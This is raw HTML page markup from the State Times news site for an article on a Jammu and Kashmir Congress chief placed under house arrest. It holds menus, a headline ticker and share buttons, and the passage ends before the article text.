href='http://news.statetimes.in/section/news/jknews/art-culture/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58101' data-id='20' data-object='category' data-layout=''><ul id='mn-ul-latest-58101'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/' title='India reserves right to ‘preemptively strike’ at sources of terror'><img src='http://news.statetimes.in/wp-content/uploads/2020/01/2-90x60.jpg?x39047' alt='India reserves right to ‘preemptively strike’ at sources of terror' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/' title='India reserves right to ‘preemptively strike’ at sources of terror'> India reserves right to ‘preemptively strike’ at sources of terror</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/' title='Well prepared to face challenge from Pak, China: Gen Rawat'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='Well prepared to face challenge from Pak, China: Gen Rawat' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/' title='Well prepared to face challenge from Pak, China: Gen Rawat'> Well prepared to face challenge from Pak, China: Gen Rawat</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/railways-announces-fare-hike-effective-from-jan-1/' title='Railways announces fare hike effective from Jan 1'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='Railways announces fare hike effective from Jan 1' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/railways-announces-fare-hike-effective-from-jan-1/' title='Railways announces fare hike effective from Jan 1'> Railways announces fare hike effective from Jan 1</a><span> - 1 hour ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/caa-binding-on-all-says-law-minister/' title='CAA binding on all, says law minister'><img src='http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047' alt='CAA binding on all, says law minister' width='70' height='47'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/caa-binding-on-all-says-law-minister/' title='CAA binding on all, says law minister'> CAA binding on all, says law minister</a><span> - 1 hour ago</span></div></li></ul><a href='http://news.statetimes.in/section/news/india-national/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58105' data-id='9' data-object='category' data-layout=''><ul id='mn-ul-latest-58105'></ul><a href='http://news.statetimes.in/section/news/world/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58100' data-id='22' data-object='category' data-layout=''><ul id='mn-ul-latest-58100'></ul><a href='http://news.statetimes.in/section/news/business/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58103' data-id='21' data-object='category' data-layout=''><ul id='mn-ul-latest-58103'></ul><a href='http://news.statetimes.in/section/news/sports/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58102' data-id='23' data-object='category' data-layout=''><ul id='mn-ul-latest-58102'></ul><a href='http://news.statetimes.in/section/news/science-tech/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<div class='subcat'><div class='active mom-cat-latest' id='mn-latest-58107' data-id='11' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58107'><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/didnt-want-to-do-surface-level-scream-fest-with-ghost-stories-zoya-akhtar/' title='Didn&#8217;t want to do surface-level scream fest with &#8216;Ghost Stories&#8217;: Zoya Akhtar'><img src='http://news.statetimes.in/wp-content/uploads/2019/12/Didnt-want-to-do-surface-level-scream-fest-with-Ghost-Stories-Zoya-Akhtar.jpg?x39047' alt='Didn&#8217;t want to do surface-level scream fest with &#8216;Ghost Stories&#8217;: Zoya Akhtar' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/didnt-want-to-do-surface-level-scream-fest-with-ghost-stories-zoya-akhtar/' title='Didn&#8217;t want to do surface-level scream fest with &#8216;Ghost Stories&#8217;: Zoya Akhtar'> Didn&#8217;t want to do surface-level scream fest with &#8216;Ghost Stories&#8217;: Zoya Akhtar</a><span>  14 hours ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/take-pride-in-recognition-of-my-profession-bachchan-on-dadasaheb-phalke-award/' title='Take pride in recognition of my profession: Bachchan on Dadasaheb Phalke Award'><img src='http://news.statetimes.in/wp-content/uploads/2019/12/Amitabh-1.jpg?x39047' alt='Take pride in recognition of my profession: Bachchan on Dadasaheb Phalke Award' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/take-pride-in-recognition-of-my-profession-bachchan-on-dadasaheb-phalke-award/' title='Take pride in recognition of my profession: Bachchan on Dadasaheb Phalke Award'> Take pride in recognition of my profession: Bachchan on Dadasaheb Phalke Award</a><span>  2 days ago</span></div></li><li class='has-thumbnail' ><div class='subcat-thumbnail'><a href='http://news.statetimes.in/amitabh-bachchan-gets-dadasaheb-phalke-award/' title='Amitabh Bachchan gets Dadasaheb Phalke Award'><img src='http://news.statetimes.in/wp-content/uploads/2019/12/Amitabh.jpg?x39047' alt='Amitabh Bachchan gets Dadasaheb Phalke Award' width='117' height='74'></a></div><div class='subcat-title'><a href='http://news.statetimes.in/amitabh-bachchan-gets-dadasaheb-phalke-award/' title='Amitabh Bachchan gets Dadasaheb Phalke Award'> Amitabh Bachchan gets Dadasaheb Phalke Award</a><span>  2 days ago</span></div></li></ul><a href='http://news.statetimes.in/section/entertainment/bollywod/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58108' data-id='12' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58108'></ul><a href='http://news.statetimes.in/section/entertainment/hollywood/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58109' data-id='13' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58109'></ul><a href='http://news.statetimes.in/section/entertainment/movies/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div><div class=' mom-cat-latest' id='mn-latest-58110' data-id='14' data-object='category' data-layout='horz'><ul id='mn-ul-latest-58110'></ul><a href='http://news.statetimes.in/section/entertainment/television/' title='' class='view_all_posts'>View all<i class='long-arrow-icon'></i></a></div></div> 
</div>
</div>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                                                                <div class="device-menu-wrap mom_visibility_device">
                        <div id="menu-holder" class="device-menu-holder">
                            <i class="fa-icon-align-justify mh-icon"></i> <span class="the_menu_holder_area"><i class="dmh-icon"></i>Menu</span><i class="mh-caret"></i>
                        </div>
                        <ul id="menu-primary-two-1" class="device-menu mom_visibility_device"><li id="menu-item-58059" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home mom_default_menu_item menu-item-iconsOnly menu-item-depth-0"><a href="http://news.statetimes.in/"><i class="icon_only momizat-icon-home"></i><span class="icon_only_label">Home</span></a></li>
<li id="menu-item-58080" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/jknews/">Jammu and Kashmir</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58091" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/topjknews/">Top J&#038;K News</a></li>
	<li id="menu-item-58083" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/local-news/">Cities &#038; Towns</a></li>
	<li id="menu-item-58086" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/jksports/">J&#038;K Sports</a></li>
	<li id="menu-item-58085" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/crime-watch/">Crime Watch</a></li>
	<li id="menu-item-58084" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/courts/">Courts</a></li>
	<li id="menu-item-58081" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/jknews/art-culture/">Art &#038; Culture</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58092" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/exclusive/">Exclusive</a>
<ul class="sub-menu ">
	<li id="menu-item-58093" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/topic/dost-khan/">Dost Khan</a></li>
	<li id="menu-item-58094" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/blunt-butcher/">Blunt Butcher</a></li>
	<li id="menu-item-58095" class="menu-item menu-item-type-taxonomy menu-item-object-post_tag mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/topic/pride-or-shame-2/">Pride or Shame</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58096" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/editorial/">Editorial</a></li>
<li id="menu-item-58104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/news/world/">World</a><div class='cats-mega-wrap '>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58101" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/news/india-national/">National</a></li>
	<li id="menu-item-58105" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/world/">World</a></li>
	<li id="menu-item-58100" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/business/">Business</a></li>
	<li id="menu-item-58103" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/sports/">Sports</a></li>
	<li id="menu-item-58102" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/news/science-tech/">Science n Tech</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58106" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-parent-item mom_mega_cats menu-item-depth-0"><a href="http://news.statetimes.in/section/entertainment/">Entertainment</a><div class='cats-mega-wrap mom_cats_horizontal'>
<div class="cats-mega-inner">

<ul class="sub-menu ">
	<li id="menu-item-58107" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/bollywod/">Bollywood</a></li>
	<li id="menu-item-58108" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/hollywood/">Hollywood</a></li>
	<li id="menu-item-58109" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/movies/">Movies</a></li>
	<li id="menu-item-58110" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/entertainment/television/">Television</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58854" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/section/lifestyle/">Lifestyle</a></li>
<li id="menu-item-58857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-parent-item mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/media-gallery/">Media Gallery</a>
<ul class="sub-menu ">
	<li id="menu-item-58858" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item active menu-item-depth-1"><a href="http://news.statetimes.in/image-gallery/">Image Gallery</a></li>
	<li id="menu-item-58856" class="menu-item menu-item-type-taxonomy menu-item-object-category mom_default_menu_item menu-item-depth-1"><a href="http://news.statetimes.in/section/video/">Video Gallery</a></li>
</ul>
<i class='responsive-caret'></i>
</li>
<li id="menu-item-58859" class="menu-item menu-item-type-post_type menu-item-object-page mom_default_menu_item menu-item-depth-0"><a href="http://news.statetimes.in/jobs/">Job Portal</a></li>
</ul>                        </div>
                                            		    <div class="nav-buttons">
                                        			<span class="nav-button nav-login">
			    <i class="momizat-icon-users"></i>
			</span>
			<div class="nb-inner-wrap">
			    <div class="nb-inner lw-inner">
			                            <div class="mom-login-widget">
                                                        <form class="mom-login-form" action="http://news.statetimes.in/wp-login.php" method="post">
					<div class="mom-username">
						<input type="text" name="log" value="" placeholder="username">
					</div>

					<div class="mom-password">
						<input type="password" name="pwd" value="" placeholder="password">
					</div>

					<div class="mom-submit-wrapper">
						<button class="button submit user-submit" name="user-submit" type="submit">Log In</button>
						<input type="checkbox" id="rememberme" name="rememberme" value="forever" >
						<label for="rememberme"><i class="fa-icon-ok"></i>Remember Me</label>
                                                <input type="hidden" name="redirect_to" value="http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/" />
					</div>
										<span class="mlw-extra">
																		<a href="http://news.statetimes.in/wp-login.php?action=lostpassword" class="mlw-reset">Lost your Password</a>
											</span>
					                            </form>
                            			    <div class="clear"></div>
                        </div>
			    </div>
			</div>
		    		                        <span class="nav-button nav-search">
                        <i class="fa-icon-search"></i>
                    </span>
                    <div class="nb-inner-wrap search-wrap border-box">
                        <div class="nb-inner sw-inner">
                        <div class="search-form mom-search-form">
                            <form method="get" action="http://news.statetimes.in">
                                <input class="sf" type="text" placeholder="Search ..." autocomplete="off" name="s">
                                <button class="button" type="submit"><i class="fa-icon-search"></i></button>
                            </form>
                            <span class="sf-loading"><img src="http://news.statetimes.in/wp-content/themes/goodnews5/images/ajax-search-nav.gif?x39047" alt="loading..." width="16" height="16"></span>
                        </div>
                    <div class="ajax_search_results">
                    </div> <!--ajax search results-->
                    </div> <!--sw inner-->
                    </div> <!--search wrap-->
                    
                            <span class="nav-button nav-social-button twitter"><a target="_blank" class="vector_icon" href="https://www.twitter.com/state_times"><i class="fa-icon-twitter"></i></a></span>
        
                <span class="nav-button nav-social-button facebook"><a target="_blank" class="vector_icon" href="https://www.facebook.com/statetimes"><i class="fa-icon-facebook "></i></a></span>        
        
                   <span class="nav-button nav-social-button gplus"><a target="_blank" class="vector_icon" href="https://plus.google.com/112398265041024324940/" ><i class="fa-icon-google-plus"></i></a></span>     
        
        
                        <span class="nav-button nav-social-button youtube"><a target="_blank" class="vector_icon" href="https://www.youtube.com/statetimes1"><i class="fa-icon-youtube"></i></a></span>
                

        

        
        
                <span class="nav-button nav-social-button tumblr"><a target="_blank" class="vector_icon" href="http://statetimes1.tumblr.com"><i class="fa-icon-tumblr"></i></a></span>
                             <span class="nav-button nav-social-button rss"><a target="_blank" class="vector_icon" href="http://news.statetimes.in/feed/"><i class="fa-icon-rss"></i></a></span>
        	
			    </div> <!--nav-buttons-->

                </div>
                </div> <!--nav inner-->
            </nav> <!--Navigation-->
            	    <div class="boxed-content-wrapper clearfix">
                        <div class="nav-shaddow"></div>
                         <div style="margin-top:-17px; margin-bottom:20px;"></div>
            
            <div class="inner">
                        
        <div class="breaking-news">
    <div class="the_ticker" style="margin:0;">
    <div class="bn-title"><span>Latest News</span></div>
    <div class="news-ticker animation-updown custom-animation" data-timeout="5000">
        <ul>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/">Stone-arrangement by a child to welcome new year</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jkpsa-urges-lt-governor-to-settle-grievances-of-private-schools/">JKPSA urges Lt Governor to settle grievances of private schools</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/">Lakhanpur toll post  abolished from New Year</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/">India reserves right to ‘preemptively strike’ at sources of terror</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/">Well prepared to face challenge from Pak, China: Gen Rawat</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/">JKPCC chief among senior Cong leaders put under house arrest</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/">BJP the gainer-BJP the loser</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/dgps-commendation-medal-announced/">DGP’s Commendation Medal announced</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/lt-guv-reviews-progress-of-national-highway-nhidcl-projects/">Lt Guv reviews progress of National Highway, NHIDCL projects</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/jk-police-set-example-with-its-handling-of-situation-post-art-370-abrogation-dgp/">J&#038;K Police set example with its handling of situation post Art 370 abrogation: DGP</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/db-refers-matter-to-cbi-for-indepth-probe/">DB refers matter to CBI for indepth probe</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/railways-announces-fare-hike-effective-from-jan-1/">Railways announces fare hike effective from Jan 1</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/hc-quashes-psa-against-five-stone-pelters-in-kashmir/">HC quashes PSA against five stone pelters in Kashmir</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/snowfall-likely-in-kashmir-on-new-year-day/">Snowfall likely in Kashmir on New Year day</a></li>
            <li><i class="fa-icon-double-angle-right"></i><a href="http://news.statetimes.in/caa-binding-on-all-says-law-minister/">CAA binding on all, says law minister</a></li>
        </ul>
    </div> <!--news ticker-->
    </div>
        </div> <!--breaking news-->
            </div>
    <div class="inner">
        
                            <div class="main_container">
           <div class="main-col">
                                <div class="category-title">
                        <div class="mom_breadcrumb breadcrumb breadcrumbs"><div class="breadcrumbs-plus">
<span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/" class="home"><span itemprop="title">Home</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/" title="News"><span itemprop="title">News</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/jknews/" title="Jammu and Kashmir"><span itemprop="title">Jammu and Kashmir</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a itemprop="url" href="http://news.statetimes.in/section/news/jknews/jammu/" title="Jammu"><span itemprop="title">Jammu</span></a></span> <span class='separator'><i class="sep fa-icon-double-angle-right"></i></span> <span itemprop="name">JKPCC chief among senior Cong leaders put under house arrest</span></div></div>                </div>
                                        <div class="base-box blog-post p-single bp-horizontal-share post-566259 post type-post status-publish format-standard category-jammu category-sliderhome category-topjknews category-imp"itemscope itemtype="http://schema.org/Article">
<div itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
    <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg">
    <meta itemprop="width" content="300">
    <meta itemprop="height" content="300">
  </div>
  <meta itemscope itemprop="mainEntityOfPage"  itemType="https://schema.org/WebPage" itemid="http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/"/>

  <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
    <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
      <meta itemprop="url" content="http://news.statetimes.in/wp-content/uploads/2015/04/stlogosmall.jpg">
      <meta itemprop="width" content="445">
      <meta itemprop="height" content="77">
    </div>
        <meta itemprop="name" content="State Times">
  </div>
  <meta itemprop="datePublished" content="2020-01-01T00:58:19+00:00"/>
  <meta itemprop="dateModified" content="2020-01-01T00:58:29+00:00"/>

<h1 class="post-tile entry-title" itemprop="headline">JKPCC chief among senior Cong leaders put under house arrest</h1>
<div class="mom-post-meta single-post-meta"><span>on: <time datetime="2020-01-01T00:58:19+00:00" class="updated">January 01, 2020</time></span><span>In: <a href="http://news.statetimes.in/section/news/jknews/jammu/" title="View all posts in Jammu">Jammu</a>, <a href="http://news.statetimes.in/section/sliderhome/" title="View all posts in SliderHome">SliderHome</a>, <a href="http://news.statetimes.in/section/news/jknews/topjknews/" title="View all posts in Top J&amp;K News">Top J&amp;K News</a>, <a href="http://news.statetimes.in/section/news/imp/" title="View all posts in Top Stories">Top Stories</a></span><span>Tags: </span><span><a href="http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/#respond">No Comments</a></span><div class="post-tools"><a href="javascript:window.print()" rel="nofollow" class="print"><i class="fa-icon-print"> </i>Print</a><a href="mailto:?subject=JKPCC chief among senior Cong leaders put under house arrest&body=JKPCC chief among senior Cong leaders put under house arrest http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/" rel="nofollow" class="email"><i class="fa-icon-envelope"> </i>Email</a></div></div><div class="entry-content">
               <div class="mom-social-share ss-horizontal border-box php-share" data-id="566259">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=JKPCC chief among senior Cong leaders put under house arrest&url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/&title=JKPCC chief among senior Cong leaders put under house arrest&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg&amp;
url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/&amp;
is_video=false&amp;description=JKPCC chief among senior Cong leaders put under house arrest"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

<br>    
